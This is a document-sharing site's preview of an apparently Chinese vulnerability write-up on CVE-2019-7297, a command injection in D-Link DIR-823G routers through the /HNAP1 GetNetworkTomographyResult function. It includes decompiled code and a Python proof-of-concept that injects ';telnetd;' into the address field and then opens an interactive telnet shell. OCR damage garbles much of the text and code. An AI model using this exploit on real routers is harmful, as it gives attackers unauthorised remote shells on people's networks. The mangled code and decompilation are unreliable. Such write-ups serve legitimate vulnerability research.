(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx

上传人:lao****ou 文档编号:794809 上传时间:2024-05-25 格式:DOCX 页数:4 大小:51.09KB
下载 相关 举报
(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx_第1页
第1页 / 共4页
(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx_第2页
第2页 / 共4页
(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx_第3页
第3页 / 共4页
(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx_第4页
第4页 / 共4页
亲,该文档总共4页,全部预览完了,如果喜欢就下载吧!
资源描述

《(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx(4页珍藏版)》请在第一文库网上搜索。

1、(CVE-2019-7297)D-1inkDIR-823G命令注入漏洞一、漏洞简介D-1inkDIR823G1.02B03及之前的版本中存在命令注入漏洞,攻击者可通过发送带有she11元字符的特制/HNAP1请求利用该漏洞执行任意的操作系统命令。GetNetworkTomographyResu1t函数中调用system函数,执行的内容中包括不受信任的用户输入AddreSS字段,攻击者可以远程执行任意命令。二、漏洞影响D-1inkDIR823G1.02B03及之前的版本三、复现过程漏洞分析漏洞原理中提到的GetNetworkTOniographyResu1t函数是在goahead二进制文件中实现

2、的。在FunctionJist中找到对应而函数地址。GetNetWOrkTOmOgraPhyReSUIt获取address,number,SiZe参数,作为Ping的参数。,rr.ajub_get(putsCerror,pmbgetMIBePINGeNUMBEK);)e1se(strcat(acStack2S2r*-cw);pr1ntf(char)$,:-Qd-vdrnuxertr1en(char),9Wic;-,(char)4.,Var1psabs9ec(0xU749size);if(Var1-O)put.sC,error,epoxbgetMIB_PIHG_5XZf);)e1se(9trcA

3、tft:tac-:rw-9);spr1ntf(char)_二JW.e:工20);_n*r1en(char)1oc1_120);trac4t(:3r(car)t._:,_:,“9trcttappng.tx2txppng.tx);Puts(AcStazaJIfiC);syaten(-:Sta:c2eo);_3tr*ar-fopen(auppng.txt*vrIf(_itreax0x0)(puts(tppng.tMtisNU11):pingaddress-cnumber-wnumber-ssizetmpping.txt2tmpping.tt但在system之前并没有对这些外来参数进行检查,如果add

4、ress为;te1netd;就能启动Te1net服务。可以看出这些参数都是通过apmib_get获取的,那么在之前一定有apmib_set进行设置,在IDA中查找关键字0x1b72,0x1b73,0x1b73,定位到apmib_set的位置,结合ghidra的反汇编代码,确定在SetNetworkTomographySettings函数中可以对这些参数进行设置。,4t1H*11oS3%rin9(0t1FnC.?pocimportrequestsfrompwnimport*IP=192.168.0.1,headers=requests.uti1s.defau1t_headers()headers

5、User-Agent=,Mozi11a5.0(WindowsNT10.0;Win64;64)App1eWebKit/537.36(KHTM1,1ikeGecko)Chrome/56.0.2924.76Safari/537.36headersSOAPAction=,headers,Content-Type=tetm1;Charset=UTF-8headersAccept=*/*headersAccept-Encoding=gzip,def1ateheadersAccept-1anguage=,zh-CNjzh;q=0.9,en;q=0.8pay1oad=jte1netd;44,r=requests.post(,http:/+IP+HNAP1,iheaders=headersdata=pay1oad)printr.textheadersSOAPAction=,http:/ZHNAP1GetNetworkTomographyResu1t,pay1oad=r=requests.post(http:/,+IP+HNAP1,iheaders=headersjdata=pay1oad)printr.textp=remote(IP,23)p.interactive(

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 应用文档 > 工作总结

copyright@ 2008-2022 001doc.com网站版权所有   

经营许可证编号:宁ICP备2022001085号

本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有,必要时第一文库网拥有上传用户文档的转载和下载权。第一文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知第一文库网,我们立即给予删除!



客服